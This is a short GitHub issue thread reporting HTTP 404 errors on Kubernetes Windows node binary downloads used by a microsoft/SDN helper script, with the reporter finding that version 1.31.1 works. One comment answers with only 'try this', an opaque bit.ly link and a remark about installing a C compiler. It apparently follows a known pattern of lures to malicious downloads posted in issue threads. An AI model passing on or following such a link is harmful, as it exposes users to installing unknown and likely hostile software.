### ISSUE TITLE
HTTP 404 On Kubernetes Binaries Install

### ISSUE THREAD

**Issue by vincent-guillemette-fr** [microsoft/SDN#616]
Hello, 

Suddenly, Urls built from https://github.com/microsoft/SDN/blob/master/Kubernetes/windows/helper.v2.psm1#L1556 return Http 404 status code, preventing Windows Node install. 

Example: https://cdn.dl.k8s.io/v1.31/kubernetes-node-windows-amd64.tar.gz

**Comment by AhmadMahmoodRana** [comment]
try this

https://bit.ly/4eugCty

you may need to install the c compiler

**Comment by vincent-guillemette-fr** [comment]
Seems to work with version 1.31.1
